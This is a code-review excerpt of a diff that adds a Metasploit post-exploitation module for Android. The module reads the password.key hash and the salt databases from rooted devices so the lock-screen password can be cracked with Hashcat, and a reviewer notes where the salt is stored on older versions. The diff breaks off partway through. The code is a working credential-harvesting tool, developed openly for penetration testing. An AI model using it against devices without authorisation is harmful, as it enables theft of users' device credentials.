modules/post/android/gather/hashdump.rb

```diff
@@ -0,0 +1,169 @@
+           To perform this operation, two things are needed.  First, a password.key file
+           is required as this contains the hash but no salt.  Next, a sqlite3 database
+           is needed (with supporting files) to pull the salt from.  Combined, this
+           creates the hash we need.  This can be cracked with Hashcat, mode 5800.
+           Samsung devices only have SHA1 hashes, while most other Android devices
+           also have an MD5 hash.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => ['h00die'],
+        'SessionTypes'  => [ 'meterpreter', 'shell' ],
+        'Platform'      => 'android',
+        'References'    => [
+          ['URL', 'https://www.pentestpartners.com/security-blog/cracking-android-passwords-a-how-to/'],
+          ['URL', 'https://hashcat.net/forum/thread-2202.html'],
+        ],
+      }
+    ))
+  end
+
+  def run
+
+    def read_store_sql(file_name, location)
+      # we need the .db file, as well as the supporting files .db-shm and .db-wal as they may contain
+      # the values we are looking for
+      db_loot_name = ''
+      ['', '-wal', '-shm'].each do |ext|
+        l = location + ext
+        f = file_name + ext
+        data = read_file(l)
+        if data.blank?
+          print_error("Unable to read #{l}")
+          return
+        end
+        print_good("Saved #{f} with length #{data.length}")
+
+        if ext == ''
+          loot_file = store_loot('SQLite3 DB', 'application/x-sqlite3', session, data, f, 'Android database')
+          db_loot_name = loot_file
+          next
+        end
+
+        loot_file = store_loot('SQLite3 DB', 'application/binary', session, data, f, 'Android database')
+
+        # in order for sqlite3 to see the -wal and -shm support files, we have to rename them
+        # we have to do this since the ext is > 3
+        # https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/auxiliary/report.rb#L391
+        new_name = "#{db_loot_name}#{ext}"
+        FileUtils.mv(loot_file, new_name)
+      end
+      SQLite3::Database.new(db_loot_name)
+    end
+
+    unless is_root?
+      fail_with Failure::NoAccess, 'This module requires root permissions.'
+    end
+
+    print_status('Attempting to determine unsalted hash.')
+    key_file = '/data/system/password.key'
+    unless file_exist?(key_file)
+      print_error('No password.key file, no password on device.')
+      return
+    end
+
+    hash = read_file(key_file)
+    if hash.empty?
+      print_error("Unable to read #{key_file}, and retrieve hash.")
+      return
+    end
+    store_loot('Key', 'plain/text', session, hash, 'password.key', 'Android password hash key')
+    print_good('Saved password.key')
+
+    print_status('Attempting to determine salt')
+    os = cmd_exec("getprop ro.build.version.release")
+    vprint_status("OS Version: #{os}")
+    if Gem::Version.new(os) < Gem::Version.new('4.3.0')
```

Comment:
I'm testing on a 4.2.2 device (android x86) and the salt is still in /data/system/locksettings.db. Let me try older versions until I can find one where it's in /data/data/com.android.providers.settings/databases/settings.db